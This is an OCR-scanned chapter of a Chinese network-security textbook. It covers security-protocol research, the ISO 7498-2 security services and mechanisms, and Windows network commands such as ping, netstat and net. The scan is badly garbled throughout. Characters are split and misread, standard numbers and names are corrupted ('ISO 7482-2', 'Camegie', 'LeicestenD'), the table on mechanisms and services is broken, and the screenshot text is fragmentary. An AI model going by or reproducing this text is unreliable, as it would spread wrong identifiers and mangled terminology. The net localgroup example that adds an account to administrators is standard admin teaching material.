要 PASV 命令 。 这 样 做 的 缺点 是 失去 了 使 用 “代理 FTP” 的 可 能 ， 但 是 在 某 些 环境 中 并 不 
需要 “代理 FTP”。 


2.2.5 ”安全 协议 的 最 新 发 展 

安全 协议 的 研究 主要 包括 两 方面 内 容 ， 即 安全 协议 的 安全 性 分 析 研 究 和 各 种 实用 安全 
协议 的 设计 与 分 析 研 究 。 安 全 协议 的 安全 性 分 析 方 法 主要 有 两 类 : 一 类 是 攻击 检验 方法 ， 
另 一 类 是 形式 化 分 析 方法 ， 其 中 安全 协议 的 形式 化 分 析 方法 是 安全 协议 研究 中 最 关键 的 研 
完 问题 之 一 。 

目前 ， 这 一 领域 中 比较 活跃 的 群体 包括 : 以 Meadows 及 Syverson 为 代表 的 美国 空军 
研究 室 ， 以 Lowe 为 代表 的 英国 莱 斯 特 (LeicestenD) 大学: 以 Schneider 为 代表 的 英国 伦敦 
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(London) 学 院 ; 以 Roscoe 为 代表 的 英国 牛津 (Oxford) 大 学 ;以 Millen 为 代表 的 美国 
Camegie Mellon 学 院 ; 以 Stoller 为 代表 的 美国 印第安 纳 (ndiana) 大 学 ， 以 Thayer、Herzon 
及 Guttman 为 代表 的 美国 MITRE 公司 ; 以 Bolignano 为 代表 的 美国 IBM 公司 ; 以 
J.Mitchell 及 M.Mitchell 为 代表 的 美国 斯 坦 福 (Stanford) 大 学 ;以 Stubblebine 为 代表 的 美国 
AT&T 实验 室 ， 以 Paulson 为 代表 的 英国 剑桥 (Cambridge) 大 学 ; 以 Abadi 为 代表 的 美国 数 
据 设备 公司 系统 研究 中 心 等 。 除 了 这 些 群 体外 ， 许 多 较 有 实力 的 计算 机 科学 系 及 公司 都 有 
专业 人 员 从 事 这 一 领域 的 研究 。 

从 大 的 方面 讲 ， 在 协议 形式 化 分 析 方 面 比较 成 功 的 研究 思路 可 以 分 为 3 种 ， 第 一 种 思 
路 是 基于 推理 知识 和 信念 的 模 态 逻 辑 ， 第 二 种 思路 是 基于 状态 搜索 工具 和 定理 证 明 技术 ; 
第 三 种 思路 是 基于 新 的 协议 模型 发 展 证 明 的 正确 性 理论 。 

在 安全 协议 的 研究 中 ， 除 理论 研究 外 ， 实 用 安全 协议 研究 的 总 趋势 是 走向 标准 化 。 我 
国学 者 虽然 在 理论 研究 方面 和 国际 上 已 有 协议 的 分 析 方面 做 了 一 些 工作 ， 但 在 实际 应 用 方 
面 与 国际 先进 水 平 还 有 一 定 的 差距 。 当 然 ， 这 主要 是 由 于 我 国 的 信息 化 进程 落后 于 先进 国 
家 的 原因 。 


2.3 安全 服务 与 安全 机 制 


为 实现 开放 系统 互 连 环境 下 的 信息 安全 ，ISO/TC9%7 技术 委员 会 制定 了 ISO 7482-2 国 
际 标准 。 它 从 体系 结构 的 角度 ， 描 述 了 实现 OSI 参考 模型 之 间 的 安全 通信 所 必须 提供 的 安 
全 服务 和 安全 机 制 ， 建 立 了 开放 系统 互联 标准 的 安全 体系 结构 框架 ， 为 网 络 安全 的 研究 呐 
定 了 基础 。 
2.3.1 安全 服务 

ISO 7498-2 提供 了 以 下 5 种 可 供 选 择 的 安全 服务 。 

1. 对 象 认 证 

对 象 认 证 (Entity Authentication) 安 全 服务 是 防止 主动 攻击 (第 9 章 将 重点 讲述 ) 的 重要 防 


御 措施 ， 它 对 计算 机 网 络 系统 环境 中 的 各 种 信息 安全 起 着 重要 的 作用 。 认 证 就 是 识别 和 证 
实 ， 识 别 是 对 一 个 对 象 的 身份 进行 判明 。 


2. 访问 控制 


访问 控制 (Access Control) 安 全 服务 是 针对 越权 使 用 资源 的 防御 措施 。 访 问 控制 可 以 分 
为 自主 访问 控制 和 强制 访问 控制 两 类 。 其 实现 机 制 可 以 是 基于 访问 控制 的 属性 访问 控制 表 
(或 访问 控制 矩阵 )， 或 者 基于 安全 标签 、 用 户 分 类 和 资源 分 档 的 多 级 控制 等 。 


3. 数据 保密 性 


数据 保密 性 (Data Confidentiality) 安 全 服务 是 针对 信息 泄露 的 防御 措施 ， 它 又 可 以 分 为 
以 下 三 种 。 
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1) “信息 保密 

保护 通信 系统 中 的 信息 或 数据 库 的 数据 。 而 对 于 通信 系统 中 的 信息 ， 又 可 以 进一步 分 
为 连接 保密 和 无 连接 保密 。 

2) 选择 保密 

保护 信息 中 被 选择 的 数据 段 。 

3) 业务 流 保密 

防止 攻击 者 通过 观察 业务 流 (例如 信 源 、 信 宿 、 传 送 时 间 、 频 率 和 路 由 等 ) 得 到 信 
息 等 。 


4. 数据 完整 性 


数据 完整 性 (Data Integrity) 安 全 服务 是 针对 非法 自 改 信息 、 文 件 和 业务 流 而 设置 的 防 
范 ， 以 保证 资源 可 获得 性 的 措施 。 它 可 以 分 为 以 下 4 种 。 

1) ”连接 的 完整 性 (包括 有 恢复 的 和 无 恢复 的 ) 

为 一 个 连接 上 的 所 有 信息 提供 完整 性 办 法 ， 探 测 是 否 对 信息 进行 了 非法 算 改 、 插 入 、 
删除 或 者 重 访 。 

2) ”选择 段 有 连接 的 完整 性 

为 一 个 连接 传送 的 信息 中 所 选择 的 信息 段 提供 完整 性 ， 判 断 所 选择 的 信息 段 是 否 被 非 
法 算 改 、 插 入 、 删 除 或 重 访 。 

3) 无 连接 的 完整 性 

为 无 连接 的 各 个 信息 提供 完整 性 ， 鉴 别 所 收 到 的 信息 是 否 被 算 改 过 。 

4) ”选择 段 无 连接 完整 性 

为 在 各 个 无 连接 的 信息 中 所 选择 的 信息 段 提供 完整 性 ， 鉴 别 所 选择 的 信息 段 是 否 被 非 
法 算 改 过 。 

5. 防 抵赖 


防 抵赖 (No-Repudiation) 安 全 服务 是 针对 对 方 进行 抵赖 的 防范 措施 ， 可 以 用 来 证 实 已 经 
发 生 过 的 操作 ， 其 操作 可 以 分 为 以 下 3 种 。 

1) ”发 送 防 抵 赖 

用 来 防止 信息 发 送 者 否认 发 送 了 信息 。 

2) ”递交 防 抵赖 

用 来 防止 接收 信息 的 对 象 否认 接收 到 信息 。 

3) 公证 

通信 双方 互 不 信任 ， 但 是 对 第 三 方 ( 即 公证 方 ) 却 都 绝对 信任 ， 于 是 依靠 第 三 方 来 证 实 
已 发 生 的 操作 。 


2.3.2 ”安全 机 制 


1. 加 密 机 制 


加 密 既 能 为 数据 提供 机 密 性 ， 也 能 为 通信 业务 流 信息 提供 机 密 性 ， 并 且 还 能 成 为 下 面 
所 述 的 一 些 安全 机 制 中 的 一 部 分 或 起 补充 作用 。 加 密 算 法 可 以 是 可 逆 的 ， 也 可 以 是 不 可 首 
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的 。 可 逆 加 密 算 法 有 两 大 类 : 中 对 称 ( 即 秘密 密 钥 ) 加 密 ， 对 于 这 样 的 加 密 ， 知 道 了 加 密 密 
钥 也 就 意味 着 知道 了 解密 密 钥 ， 反 之 亦 然 。@@ 非 对 称 ( 如 公开 密 钥 ) 加 密 ， 对 于 这 种 加 密 ， 
知道 了 加 密 密 钥 并 不 意味 着 也 知道 解密 密 钥 ， 反 之 亦 然 。 这 种 系统 的 这 样 两 个 密 钥 有 时 称 
为 “ 公 钥 ”与 “ 私 钥 ”。 不 可 逆 加 密 算 法 可 以 使 用 密 钥 ， 也 可 以 不 使 用 ， 若 使 用 密 钥 ， 则 
密 钥 可 以 是 公开 的 ， 也 可 以 是 秘密 的 。 除 了 某 些 不 可 逆 加 密 算法 的 情况 外 ， 加 密 机 制 的 存 
在 便 意味 着 要 使 用 密 钥 管理 机 制 。 


2. 数字 签名 机 制 


这 种 机 制 确定 两 个 过 程 : 对 数据 单元 签名 和 验证 签 过 名 的 数据 单元 。 第 一 过 程 使 用 签 
名 者 私有 的 ( 即 独 有 的 和 机 密 的 ) 信 息 。 第 二 个 过 程 所 有 的 规程 与 信息 是 公之于众 的 ， 但 不 
能 够 从 他 们 推断 出 该 签名 者 的 私有 信息 。 签 名 过 程 涉及 使 用 签名 者 的 私有 信息 作为 私 钥 ， 
或 对 数据 单元 进行 加 密 ， 或 产生 出 该 数据 单元 的 一 个 密码 校 验 值 ， 校 验 过 程 涉及 使 用 公开 
的 规程 与 信息 来 决定 该 签名 是 不 是 用 签名 者 的 私有 信息 产生 的 。 签 名 机 制 的 本 质 特 征 是 该 
签名 只 有 使 用 签名 者 的 私有 信息 才能 产生 出 来 。 因 而 ， 当 该 签名 得 到 验证 后 ， 它 能 在 事后 
的 任何 时 刻 向 第 三 方 (例如 法 官 或 仲裁 人 ) 证 明 : 只 有 私有 信息 的 唯一 拥有 者 才能 产生 这 个 
签名 。 


3. 访问 控制 机 制 


为 了 决定 和 实施 一 个 实体 的 访问 权 。 访 问 控制 机 制 可 以 使 用 该 实体 已 鉴别 的 身份 ， 或 
使 用 有 关 该 实体 的 信息 (例如 它 与 一 个 已 知 的 实体 集 的 从 属 关系 )， 或 使 用 该 实体 的 权利 。 
如 果 这 个 实体 试图 使 用 非 授权 的 资源 ， 或 者 以 不 正当 方式 使 用 授权 资源 ， 那 么 访问 控制 功 
能 将 拒绝 这 一 企图 ， 另 外 还 可 能 产生 一 个 报警 信号 或 记录 它 作为 安全 审计 跟踪 的 一 部 分 来 
报告 这 一 事件 。 对 于 无 连接 数据 传输 ， 发 给 发 送 者 的 拒绝 访问 通知 只 能 作为 强加 于 原 发 的 
访问 控制 结果 而 被 提供 。 

访问 控制 机 制 可 以 建立 在 使 用 下 列 的 一 种 或 多 种 手段 之 上 : @D 访 问 控制 信息 库 ， 在 这 
里 保存 有 对 等 实体 的 访问 权限 ， 这 些 信 息 可 以 由 授权 中 心 保存 ， 或 由 正 被 访问 的 那个 实体 
保存 。 信 息 的 形式 可 以 是 一 个 访问 控制 表 ， 或 者 等 级 结构 ， 或 者 分 布 式 结构 的 矩阵 。 还 要 
预先 假定 对 等 实体 的 鉴别 已 得 到 保证 。 鉴 别 信息 ， 例 如 口令 ， 对 这 一 信息 的 拥有 和 出 示 便 
证 明正 在 进行 访问 的 实体 已 被 授权 。@ 权 力 : 对 它 的 拥有 和 出 示 便 证 明 有 权 访问 由 该 权力 
所 规定 的 实体 或 资源 ， 其 中 权力 应 是 不 可 伪造 的 并 以 可 信赖 的 方式 进行 传递 。@ 安 全 标 
记 : 当 与 一 个 实体 相关 联 时 ， 这 种 安全 标记 可 以 用 来 表示 同意 或 拒绝 访问 ， 通 常 根据 安全 
策略 商定 试图 访问 的 时 间 、 试 图 访问 的 路 由 和 访问 持续 期 。 

访问 控制 机 制 可 应 用 于 通信 联系 中 的 一 个 端点 ， 或 应 用 于 任 一 中 间 点 ， 涉 及 原 出 发 点 
或 任 一 中 间 点 的 访问 控制 是 用 来 决定 发 送 者 是 否 被 授权 与 指定 的 接受 者 进行 通信 ， 或 是 否 
被 授权 使 用 所 要 求 的 通信 资源 。 在 无 连接 数据 传输 目的 端 上 的 对 等 访问 控制 机 制 要 求 在 原 
发 点 上 必须 事先 知道 ， 还 必须 记录 在 安全 管理 信息 库 中 。 


4. 数据 完整 性 机 制 


数据 完整 性 有 两 个 方面 : 单个 数据 单元 或 字段 的 完整 性 和 数据 单元 或 字段 流 的 完整 
性 。 一 般 来 说 ， 用 来 提供 这 两 种 类 型 完整 性 服务 的 机 制 是 不 同 的 ， 没 有 第 一 类 完整 性 服 


第 2 章 网 络 安全 基础 57 


务 ， 第 二 类 完整 性 服务 是 无 法 提供 的 。 决 定单 个 数据 单元 的 完整 性 涉及 两 个 过 程 ， 一 个 在 
发 送 实体 上 ， 一 个 在 接收 实体 上 。 发 送 实体 给 数据 单元 附加 一 个 量 ， 它 为 该 数据 的 函数 ， 
它 可 以 是 像 分 组 校 验 码 那样 的 补充 信息 ， 也 可 以 是 一 个 密码 校 验 值 ， 而 且 它 本 身 可 以 被 加 
密 。 接 收 实体 产生 一 个 相应 的 量 ， 并 把 它 与 接收 到 的 那个 量 进行 比较 以 决定 该 数据 是 否 在 
传送 中 被 算 改 过 。 单 靠 这 种 机 制 不 能 防止 单个 数据 单元 的 重 放 。 在 网 络 体系 结构 的 适当 层 
上 ， 完 整 性 检查 可 能 在 本 层 或 较 高 层 上 导致 恢复 作用 (例如 经 重 传 或 纠 错 )， 对 于 连接 方式 
数据 传送 ， 保 护 数据 单元 序列 的 完整 性 ( 即 防止 乱 序 、 数 据 的 丢失 、 重 放 、 插 入 和 自 改 ) 还 
另外 需要 某 种 明显 的 排序 形式 ， 例 如 顺序 号 、 时 间 标 记 或 密码 链 。 对 于 无 连接 数据 传送 ， 
时 间 标 记 可 以 用 来 在 一 定 程度 上 提供 保护 ， 防 止 单个 数据 单元 的 重 放 。 


5. 鉴别 交换 机 制 


可 用 于 鉴别 交换 的 一 些 技术 是 : 使 用 鉴别 信息 ， 例 如 口令 ， 由 发 送 实体 提供 而 由 接收 
实体 验证 ， 密 码 技术 ， 使 用 实体 的 特征 或 拥有 物 。 这 种 机 制 可 设置 在 对 等 层 网 络 中 的 (N) 
层 以 提供 对 等 实体 鉴别 ， 如 果 在 鉴别 实体 时 ， 这 一 机 制 得 到 否定 的 结果 ， 就 会 导致 连接 的 
拒绝 或 终止 ， 也 可 能 会 在 安全 审计 跟踪 中 增加 一 个 记录 ， 或 给 安全 管理 中 心 一 个 报告 。 当 
采用 密码 技术 时 ， 这 些 技术 可 以 与 “握手 ”协议 结合 起 来 以 防止 重 放 ( 即 确保 存活 期 )。 鉴 
别 交 换 技 术 的 选用 取决 于 使 用 它们 的 环境 。 在 许多 场合 ， 它 们 将 必须 与 下 列 各 项 结合 
用 : 时 间 标 记 和 同步 时 钟 、 两 方 握手 和 三 方 握手 (分 别 对 应 于 单方 鉴别 和 相互 鉴别 )、 由 数 
字 签 名 和 公证 机 制 实现 的 抗 抵 赖 服务 。 


6. 通信 业务 填充 机 制 


通信 业务 填充 机 制 能 用 来 提供 各 种 不 同 级 别 的 保护 。 抵 抗 通信 业务 分 析 ， 这 种 机 制 只 
有 在 通信 业务 填充 受到 机 密 服务 保护 时 才 是 有 效 的 。 路 由 选择 控制 机 制 能 动态 地 或 预定 地 
选取 路 由 ， 以 便 只 使 用 物理 上 安全 的 子 网 络 、 中 继 站 或 链 路 。 在 检测 到 持续 的 操作 攻击 
时 ， 端 系统 可 希望 指导 网 络 服务 的 提供 者 经 不 同 的 路 由 建立 连接 。 带 有 某 些 安全 标记 的 数 
据 可 能 被 安全 策略 禁止 通过 某 些 子 网 络 、 中 继 或 链 路 。 连 接 的 发 起 者 (或 无 连接 数据 单元 
的 发 送 者 ) 可 以 指定 路 由 选择 说 明 ， 由 它 请 求 回避 某 些 特定 的 子 网 络 、 链 路 或 中 继 。 

7. 公证 机 制 

有 关 在 两 个 或 多 个 实体 之 间 通 信 的 数据 性 质 ， 如 它 的 完整 性 、 原 发 、 时 间 和 目的 地 等 
能 够 借助 公证 机 制 而 得 到 确保 。 这 种 保证 是 由 第 三 方 公 证 人 提供 的 ， 公 证 人 为 通信 实体 所 
信任 ， 并 掌握 必要 的 信息 以 一 种 可 证 实 方式 提供 所 需 的 保证 。 每 个 通信 事例 可 使 用 数字 签 
名 、 加 密 和 完整 性 机 制 以 适应 公证 人 提供 的 那 种 服务 。 当 这 种 公证 机 制 被 用 到 时 ， 数 据 便 
在 参与 通信 的 实体 之 间 经 由 受 保护 的 通信 实例 和 公证 方 进行 通信 。 


2.3.3 ”安全 机 制 与 安全 服务 之 间 的 关系 


安全 服务 可 以 由 一 种 或 多 种 安全 机 制 来 提供 ， 而 有 的 安全 机 制 又 可 以 用 于 实现 多 种 安 
全 服务 ， 它 们 的 关系 如 表 2-13 所 示 。 
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表 2-13 安全 机 制 与 安全 服务 的 关系 表 


路 由 


控制 仲裁 


数据 源 验 证 

访问 控制 服务 
连接 的 保密 性 

无 连接 的 保密 性 
选择 域 的 保密 性 
信息 流 的 保密 性 

带 恢复 的 连接 完整 性 
不 带 恢复 连接 的 完整 性 
选择 域 的 连接 完整 性 
无 连接 的 完整 性 


注 : 立 表示 该 机 制 提供 该 安全 服务 ， 或 与 其 他 机 制 结合 提供 安全 服务 。 


2.4 网 络 操作 命令 


为 了 能 够 进行 网 络 管理 ， 需 要 使 用 到 以 下 这 些 常用 的 网 络 命令 。 


2.4.1 ipconfig 


使 用 ipconfig 命令 能 够 对 网 络 进行 查看 和 管理 ， 根 据 参数 的 不 同 可 以 实现 不 同 的 
功能 。 


1. 使 用 ipconfig/all 命令 查看 配置 


发 现 和 解决 TCP/IP 网 络 问题 时 ， 先 检查 出 现 问题 的 计算 机 上 的 TCP/IP 配置 。 可 以 使 
用 ipconfig 命令 获得 主机 的 配置 信息 ， 包 括 IP 地 址 、 子 网 掩 码 和 默认 网 关 。 

使 用 带 /all 选项 的 ipconfig 命令 时 ， 将 给 出 所 有 接口 的 详细 配置 报告 ， 包 括 任何 已 配 
置 的 串 行 端口 。 使 用 ipconfig/all 命令 ， 可 以 将 命令 输出 重 定 向 到 某 个 文件 ， 并 将 输出 粘贴 
到 其 他 文档 中 。 也 可 以 用 该 输出 确认 网 络 上 每 台 计 算 机 的 TCP/IP 配置 ， 或 者 进一步 调查 
TCP/IP 网 络 问题 。 

如 图 2-9 所 示 的 ipconfig/all 命令 输出 ， 把 该 计算 机 配置 成 静态 配置 P 地 址 ， 并 使 用 
DNS 服务 器 解析 名 称 。 
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RIL8169/8118 Fanily Gigabit 


0-F3-B1-F9-18 


Interface 


3-45-88-06-00 


2-9 ipconfig/all 命令 输出 
如 果 TCP/IP 配置 没有 问题 ， 下 一 步 测试 能 否 连 接 到 TCP/IP 网 络 上 的 其 他 主机 。 
2. 使 用 ipconfig/renew 命令 刷新 配置 


解决 TCP/IP 网 络 问题 时 ， 先 检查 出 现 问题 的 计算 机 上 的 TCP/IP 配置 。 如 果 计 算 机 启 
用 DHCP 并 使 用 DHCP 服务 器 获得 配置 ， 可 使 用 ipconfig/renew 命令 开始 刷新 配置 。 

使 用 ipconfig/renew 命令 时 ， 使 用 DHCP 服务 的 计算 机 上 的 所 有 网 卡 (除了 那些 手动 配 
置 的 适配器 ) 都 尽量 连接 到 DHCP 服务 器 ， 更 新 现 有 配置 或 者 获得 新 配置 。 

也 可 以 使 用 带 /release 选项 的 ipconfig 命令 释放 主机 的 当前 DHCP 配置 。 


2.4.2 ping 


ping 命令 有 助 于 验证 IP 级 的 连通 性 。 发 现 和 解决 问题 时 ， 可 以 使 用 ping 命令 向 目标 
主机 名 或 IP 地 址 发 送 ICMP 回应 请 求 。 需 要 验证 主机 能 否 连接 到 TCP/IP 网 络 和 网 络 资源 
时 ， 也 可 使 用 ping 命令 ， 还 也 可 以 使 用 ping 命令 隔离 网 络 硬 件 问题 和 不 兼容 配置 。 

ping 命令 的 格式 及 其 参数 如 图 2-10 所 示 。 
其 中 常见 参数 说 明 如 下 。 
-t: 校 验 与 指定 计算 机 的 连接 ， 直 到 用 户 中 断 。 
-a: 将 地 址 解析 为 计算 机 名 。 
-ncount: 发 送 由 count 选项 指定 数量 的 echo 报 文 ， 默 认 值 为 4。 
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@ -llength: 发 送 包 含 由 length 选项 指定 数据 长 度 的 echo 报 文 。 默 认 值 为 64 字 
节 ， 最 大 值 为 8192 字 节 。 


\¥INDOYS\systen32\cad. exe 


IC: \Docunents an 


[9 


flag in packet. 


ount hops. 


Settings Adninistrator> 


图 2-10 ping 命令 的 格式 及 其 参数 
ping 命令 有 两 种 常见 的 用 法 : 一 个 是 ping IP 地 址 ; 另 一 种 是 ping 主机 域名 。 
ping 命令 主要 是 用 于 网 络 的 连通 性 测试 ， 测 试 网 线 是 否 连通 ， 网 卡 配 置 是 否 正确 及 
IP 地 址 是 否 可 用 等 。 但 是 攻击 者 也 会 用 ping 命令 来 收集 主机 信息 以 作为 一 种 攻击 手段 。 
通常 最 好 先 用 ping 命令 验证 本 地 计算 机 和 网 络 主机 之 间 的 路 由 是 否 存在 ， 以 及 要 连 
接 的 网 络 主机 的 他 地 址 。ping 目标 主机 的 耳 地 址 ， 看 它 是 否 有 响应 ， 如 下 所 示 。 


ping 主机 名 或 pingIP 地 址 


使 用 ping 命令 时 应 该 执行 以 下 步骤 : 

(1) ping 环 回 地 址 验证 是 否 在 本 地 计算 机 上 安装 了 TCP/IP 协议 以 及 配置 是 否 正确 : 

ping 127.0.0.1 

(2) ping 本 地 计算 机 的 卫 地 址 ， 验 证 是 否 已 正确 地 添加 到 网 络 : 

ping IP address of local host 

(3) ping 默认 网 关 的 IP 地 址 ， 验 证 默认 网 关 是 否 运 行 以 及 能 否 与 本 地 网 络 上 的 本 地 
主机 通信 : 

ping IP address of default gateway 

(4) ping 远程 主机 的 人 P 地 址 验证 能 否 通过 路 由 器 通信 : 


ping IP address of remote host 


例如 ， 希 望 验证 能 否 连接 河北 联合 大 学 ， 则 
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ping www.heuu.edu .cn 


ping 命令 用 Windows 套 接 字 样式 的 名 称 解 析 ， 将 计算 机 名 解析 成 P 地 址 ， 所 以 如 果 
用 地 址 ping 成 功 ， 但 是 用 名 称 ping 失败 ， 则 问题 出 在 地 址 或 名 称 解 析 上 ， 而 不 是 网 络 连 
通 性 的 问题 。 

如 果 在 任何 点 上 都 无 法 成 功 地 使 用 ping， 请 确认 : 

e@ ”安装 和 配置 TCP/IP 协议 之 后 重新 启动 计算 机 。 

@ “Intemet 协议 (TCP/IP) 属 性 ”对 话 框 的 “常规 ”选项 卡 中 的 本 地 计算 机 的 卫 地 

址 有 效 而 且 正 确 。 

可 以 使 用 ping 命令 的 不 同 选项 来 指定 要 使 用 的 数据 包 大 小 、 要 发 送 多 少数 据 包 、 是 
否 记录 用 过 的 路 由 、 要 使 用 的 生存 时 间 (TTL) 值 以 及 是 否 设 置 不 分 段 标志 。 可 以 输入 
“ping-? ”查看 这 些 选项 。 

默认 情况 下 ， 在 显示 “请 求 超时 ”信息 之 前 ，ping 命令 等 待 1000ms(1s) 的 时 间 让 每 个 
响应 返回 。 如 果 通 过 ping 命令 探测 的 远程 系统 经 过 长 时 间 延 迟 的 链 路 ， 如 卫星 链 路 ， 则 
响应 可 能 会 花 更 长 的 时 间 才 能 返回 。 可 以 使 用 -w( 等 待 ) 选 项 指定 更 长 时 间 的 超时 。 


2.4.3 arp 


使 用 arp 命令 可 以 解决 硬件 地 址 的 问题 。 地 址 解析 协议 (ARP) 允 许 主机 查找 同一 物理 
网 络 上 主机 的 媒体 访问 控制 地 址 (如 果 给 出 后 者 的 IP 地 址 )。 为 使 ARP 更 加 有 效 ， 每 个 计 
算 机 缓存 IP 到 媒体 访问 的 控制 地 址 映射 ， 消 除 重复 的 ARP 广播 请 求 。 

可 以 使 用 amp 命令 查看 和 修改 本 地 计算 机 上 的 ARP 表 项 。arp 命令 对 于 查看 ARP 组 
存 和 解决 地 址 解析 问题 非常 有 用 ， 如 图 2-11 所 示 。 


图 2-11 arp 缓存 


2.4.4 nbtstat 


TCP/IP 协议 上 的 NeBIOS(NetBT) 将 NetBIOS 名 称 解析 成 卫 地 址 。TCP/IP 协议 为 
NetBIOS 名 称 解 析 提 供 了 很 多 选项 ， 包 括 本 地 缓存 搜索 、WINS 服务 器 查询 、 广 播 、DNS 
服务 器 查询 以 及 Lmhosts 和 主机 文件 搜索 。 

nbtstat 命令 是 解决 NetBIOS 名 称 解析 问题 的 有 用 工具 ， 可 以 使 用 nbtstat 命令 删除 或 
更 正 预 加 载 的 项 目 。 

@ nbtstat -n: 显示 由 服务 器 或 重 定向 器 之 类 的 程序 在 系统 上 本 地 注册 的 名 称 。 
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nbtstat -c: 显示 NetBIOS 名 称 缓存 ， 包 含 其 他 计算 机 的 名 称 对 地 址 的 映射 。 
nbtstat -R: 清除 名 称 缓存 ， 然 后 从 Lmhosts 文件 重新 加 载 。 

nbtstat -RR: 释放 在 WINS 服务 器 上 注册 的 NetBIOS 名 称 ， 然 后 刷新 它们 的 
注册 。 

@ nbtstat -a name: 对 name 选项 指定 的 计算 机 执行 NetBIOS 适配器 状态 命令 。 适 
配器 状态 命令 将 返回 计算 机 的 本 地 NetBIOS 名 称 表 ， 以 及 适配器 的 媒体 访问 控 
制 地 址 。 

@ nbtstat -S: 列 出 当前 的 NetBIOS 会 话 及 其 状态 (包括 统计 )。 


2.4.5 netstat 


可 以 使 用 netstat 命令 显示 协议 统计 信息 和 当前 的 TCP/IP 网 络 连 接 。 

@ netstat-a: 显示 所 有 连接 和 监听 窗口 。 

@ netstat -b: 显示 包含 于 创建 每 个 连接 或 监听 端口 的 可 执行 组 件 。 在 某 些 情况 下 已 

知 可 执行 组 件 拥有 多 个 独立 组 件 ， 并 且 在 这 些 情况 下 包含 于 创建 连接 或 监听 端口 

的 组 件 序列 被 显示 。 

netstat -e: 显示 以 太 网 统计 信息 。 此 选项 可 以 与 -s 选项 组 合 使 用 。 

netstat -n: 以 数字 形式 显示 地 址 和 端口 号 。 

netstat -o: 显示 与 每 个 连接 相关 的 所 属 进程 ID。 

netstat -p proto: 显示 proto 指定 的 协议 的 连接 ，proto 可 以 是 下 列 协议 之 一 ; 

TCP、UDP、TCPv6 或 UDPv6。 如 果 与 -s 选项 一 起 使 用 以 显示 按 协议 统计 信 

息 ，proto 可 以 使 下 列 协议 之 一 : IP、IPv6、ICMP、ICMPv6、TCP、TCPvV6、 

UDP 或 UDPv6。 

@ netstat-r: 显示 路 由 表 。 
netstat -s: 显示 按 协议 统计 信息 。 默 认 显 示 卫 、IPv6、ICMP、ICMPv6、TCP、 
TCPv6、UDP 和 UDPv6 的 统计 信息 。 

@ netstat -p: 用 于 指定 默认 情况 的 子 集 。 

@ netstat -Vv: 与 -b 选项 一 起 使 用 时 将 显示 包含 于 为 所 有 可 执行 组 件 创建 连接 或 监 
听 端 口 的 组 件 。 


2.4.6 tracert 


tracert( 跟 踪 路 由 ) 是 路 由 跟踪 实用 程序 ， 用 于 确定 IP 数据 访问 目标 所 采取 的 路 径 。 
tracert 命令 用 IP 生存 时 间 (TTL) 字 段 和 ICMP 错误 消息 来 确定 从 一 个 主机 到 网 络 上 其 他 主 
机 的 路 由 。 

通过 向 目标 发 送 不 同 的 卫 生存 时 间 (TTL) 值 的 “Intemet 控制 消息 协议 ICMP)” 回 应 
数据 包 ，tracert 诊断 程序 确定 到 达 目 标 所 采取 的 路 由 。 要 求 路 径 上 的 每 个 路 由 器 在 转发 数 
据 包 之 前 至 少将 数据 包 上 的 TTL 值 递 减 1。 数 据 包 上 的 TIL 减 为 0 时 ， 路 由 器 应 该 将 
“ICMP 已 超时 ”的 消息 发 回 源 系统 。 

tracert 先 发 送 TTL 为 1 的 回应 数据 包 ， 并 在 随后 的 每 次 发 送 过 程 中 将 TTL 值 递增 
1， 直 到 目标 响应 或 TTL 达到 最 大 值 ， 从 而 确定 路 由 。 通 过 检查 中 间 路 由 器 发 回 的 
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“ICMP 已 超时 ”的 消息 来 确定 路 由 。 某 些 路 由 器 不 经 询问 直接 丢弃 TTL 过 期 的 数据 包 ， 
这 在 tracert 实用 程序 中 看 不 到 。 

tracert 命令 按 顺 序 打印 出 返回 的 “ICMP 已 超时 ”消息 的 路 径 中 近 端 路 由 器 接口 的 列 
表 。 如 果 使 用 -d 选项 ， 则 tracert 实用 程序 不 在 每 个 卫 地 址 上 查询 DNS 。 

可 以 使 用 tracert 命令 确定 数据 包 在 网 络 上 的 停止 位 置 ， 对 于 解决 大 的 网 络 问题 非常 
有 用 。 


2.4.7 net 


这 个 命令 是 网 络 命令 中 最 重要 的 一 个 ， 必 须 透 彻 掌握 它 的 每 一 个 子 命令 的 用 法 ， 因 为 
它 的 功能 非常 强大 ， 许 多 Windows 系统 网 络 命令 都 是 以 net 开始 的 。 通 过 输入 “net/? ” 
可 查阅 可 用 的 net 命令 ， 通 过 输入 “nethelp ”命令 可 在 命令 行 中 获得 net 命令 的 语法 
帮助 。 


1. net start<service name> 命 令 


net start 命令 用 于 启动 本 地 或 远程 主机 上 的 服务 ， 或 显示 已 启动 服务 的 列表 。service 
包括 下 列 服务 : alerter、client service for netware、clipbook server、computer browser、dhcp 
client 、directory replicator 、eventlog 、ftp publishing service 、]lpdsvc 、messenger 、 Det 
logon、 network dde、network dde dsdm、network monitoring agent、 nt lm security support 
provider、ole、remote access connection manager、 remote access isnsap service、 remote 
access server、 remote procedure call(rpc) locator、 remote procedure call(rpc) service、 
schedule 、server、simple tcp/ip service 、snmp 、spooler 、tcp/ip netbios helper、ups 及 
workstation。 如 果 服 务 名 是 两 个 或 两 个 以 上 的 词 ， 如 Net Logon 或 Computer Browser， 则 
必须 用 引号 (") 引 住 。 


2. net stop <service name> 命 令 


net stop 命令 用 于 停止 本 地 或 远程 主机 上 开启 的 服务 。 例 如 ， 停 止 Telnet 服务 : net 
stop telnet。 


3. net user 命令 


net user 命令 用 于 查看 和 用 户 有 关 的 情况 ， 包 括 新 建 账号 、 删 除 账号 、 查 看 账号 、 激 
活 账号 及 禁用 账号 等 。 如 果 不 带 参数 就 是 查看 所 有 用 户 。 

创建 账号 : net user abc 123/add， 即 创建 一 个 用 户 名 为 abc， 密 码 为 123 的 账号 ， 默 认 
为 user 组 成 员 。 

删除 账号 : net user abc/del， 即 删除 用 户 名 为 abc 的 账号 。 

禁用 账号 : net user abc/active: no， 即 禁用 用 户 名 为 abc 的 账号 。 

激活 账号 : net user abc/active: yes， 即 激活 用 户 名 为 abc 的 账号 。 


4. net localgroup 命令 


net localgroup 命令 添加 、 显 示 或 更 改 本 地 组 。 如 果 不 带 参 数 就 是 查看 所 有 用 户 组 。 
net localgroup 命令 可 以 用 来 把 某 个 账号 提升 为 administrators 组 账号 ， 例 如 : net 
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localgroup administrators abc/add。 
5. net share 命令 


net share 命令 用 于 显示 、 创 建 和 删除 共享 资源 。 例 如 : net share 命令 显示 共享 资源 。 
关闭 共享 : net share 命令 共享 资源 名 /del。 


2.4.8 nslookup 


